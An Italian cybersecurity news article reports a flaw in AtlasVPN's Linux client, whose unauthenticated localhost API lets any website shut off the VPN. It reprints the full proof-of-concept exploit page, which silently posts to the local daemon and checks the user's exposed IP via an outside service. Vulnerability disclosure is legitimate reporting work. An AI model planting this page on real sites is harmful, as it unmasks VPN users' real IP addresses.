C'è poco da nascondersi. Il bug sul client di Atlas VPN rende tutti visibili
Red Hot Cyber
Condividi la tua difesa. Incoraggia l'eccellenza. La vera forza della cybersecurity risiede nell'effetto moltiplicatore della conoscenza.
Cerca
Crowdstriker 970×120
320×100
C’è poco da nascondersi. Il bug sul client di Atlas VPN rende tutti visibili

C’è poco da nascondersi. Il bug sul client di Atlas VPN rende tutti visibili

Redazione RHC : 4 Settembre 2023 16:46

Pochi giorni fa sul sito Reddit è apparsa la notizia della scoperta di una grave vulnerabilità di sicurezza nel client AtlasVPN per il sistema operativo Linux.

Un ricercatore di sicurezza informatica che ha voluto rimanere anonimo ha pubblicato un exploit PoC funzionante e ha dimostrato al pubblico come gli aggressori possono ottenere l’accesso al vero indirizzo IP di qualsiasi utente della versione Linux del client VPN menzionato sopra.

“AtlasVPN non prende sul serio la sicurezza dei suoi utenti. Le loro soluzioni di sicurezza software fanno così schifo che è difficile credere che si tratti di un bug e non di una backdoor. Nessuno può essere così incompetente”, uno specialista anonimo ha criticato l’approccio dell’azienda.


RHC0002 CTIP Corso Dark Web Cyber Threat Intelligence

Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)?
Stiamo per avviare il corso intermedio in modalità "Live Class" del corso "Dark Web & Cyber Threat Intelligence". 
A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente.  
Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato.
Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile. 
Guarda subito l'anteprima gratuita del corso su academy.redhotcyber.com
Contattaci per ulteriori informazioni tramite WhatsApp al 375 593 1011 oppure scrivi a [email protected]


Supporta Red Hot Cyber attraverso: 

  1. L'acquisto del fumetto sul Cybersecurity Awareness
  2. Ascoltando i nostri Podcast
  3. Seguendo RHC su WhatsApp
  4. Seguendo RHC su Telegram
  5. Scarica gratuitamente “Byte The Silence”, il fumetto sul Cyberbullismo di Red Hot Cyber

Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.

<html>
 <head>
  <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
</head>
 <body>
  <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
 You should be running the atlasvpn linux client and be connected to a VPN.
Use <b>atlasvpn connect</b> to connect to a VPN server.
 </code></pre>
   <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
  <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
    <button type="submit" style="display: none"></button>
  </form>
   <script>
    window._currentIP = false;
     // Run main exploit code
    window.addEventListener('load', function () {
      addIPToLog();
      setTimeout(triggerFormSubmission, 1000);
      setTimeout(addIPToLog, 3000);
    });
     // Blind CORS request to atlasvpnd to disconnect the VPN
    function triggerFormSubmission() {
      var logDiv = document.getElementById('log');
      logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";
      document.getElementById('stopForm').submit();
    }
     // Gets IP from ipfy API (this, of course, could be your server)
    function addIPToLog() {
      var logDiv = document.getElementById('log');
      var xhr = new XMLHttpRequest();
       xhr.open('GET', 'https://api.ipify.org?format=json', true);
       xhr.onload = function () {
        var ipAddress = window._currentIP;
        if (xhr.status === 200) {
          var response = JSON.parse(xhr.responseText);
          ipAddress = response.ip;
           logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";
        } else {
          logDiv.innerHTML += '[-] Error fetching IP address.\n';
        }
         // Check if the IP changed. If yes: Success.
        if (window._currentIP && window._currentIP != ipAddress) {
          logDiv.innerHTML += "[+] Successfully disconnected VPN."
        }
        if (window._currentIP && window._currentIP == ipAddress) {
          logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
        }
         // Save IP for next iteration.
        window._currentIP = ipAddress;
      };
       xhr.send();
    }
  </script>
</body>
</html>

Secondo il ricercatore la vulnerabilità è dovuta a una serie di gravi errori nell’architettura dell’applicazione. Nello specifico, il client AtlasVPN apre l’API su localhost sulla porta 8076, che non ha assolutamente alcun tipo di autenticazione.

Sulla base di ciò, qualsiasi programma in esecuzione sul computer, incluso un browser Web, può avere pieno accesso a questa porta. Ciò significa che qualsiasi sito web con il contenuto appropriato può inviare una richiesta su questa porta e disabilitare banalmente la VPN, rivelando quindi il reale indirizzo IP dell’utente .

L’esperto ha provato a contattare il supporto AtlasVPN per segnalare la vulnerabilità, ma non ha ricevuto risposta. A suo avviso, ciò indica un atteggiamento negligente dell’azienda nei confronti della sicurezza dei propri clienti.

Al momento della pubblicazione di questa notizia, i rappresentanti di AtlasVPN non hanno commentato la situazione. 

Si consiglia a tutti gli utenti del client sotto Linux di prestare attenzione quando visitano siti non verificati o addirittura di modificare temporaneamente il client VPN finché la vulnerabilità non verrà risolta.

Immagine del sitoRedazione
La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull'informatica in generale.

Lista degli articoli

Articoli in evidenza

Immagine del sito
Le aziende corrono verso l’IA mentre le “AI Ombra” aprono nuovi fronti di rischio
Di Redazione RHC - 03/12/2025

L’adozione su larga scala dell’intelligenza artificiale nelle imprese sta modificando in profondità i processi operativi e, allo stesso tempo, introduce nuovi punti critici per la sicurezza. Le a...

Immagine del sito
A tutto Open Source! Esce Mistral 3, e le AI entrano nel mondo OnPrem
Di Redazione RHC - 03/12/2025

L’azienda francese Mistral AI ha presentato la sua linea di modelli Mistral 3, rendendoli completamente open source con licenza Apache 2.0. La serie include diversi modelli compatti e densi con 3, 8...

Immagine del sito
888: il data-leaker seriale! L’outsider del darkweb che ha costruito un impero di dati rubati
Di Luca Stivali - 02/12/2025

Nel panorama dei forum underground esistono attori che operano in modo episodico, alla ricerca di un singolo colpo mediatico, e altri che costruiscono nel tempo una pipeline quasi industriale di comp...

Immagine del sito
Anatomia di una Violazione Wi-Fi: Dalla Pre-connessione alla Difesa Attiva
Di Francesco Demarcus - 02/12/2025

Nel contesto odierno, proteggere una rete richiede molto più che impostare una password complessa. Un attacco informatico contro una rete wireless segue un percorso strutturato che evolve dal monitor...

Immagine del sito
La verità scomoda sul DPO: il problema non è l’IT… è proprio lui!
Di Stefano Gazzella - 02/12/2025

Il DPO, ma anche il consulente privacy, interagisce in modo significativo con il mondo dell’IT. Purtroppo non sempre lo fa in modo corretto, soprattutto perché alcuni falsi miti provocano quel rumo...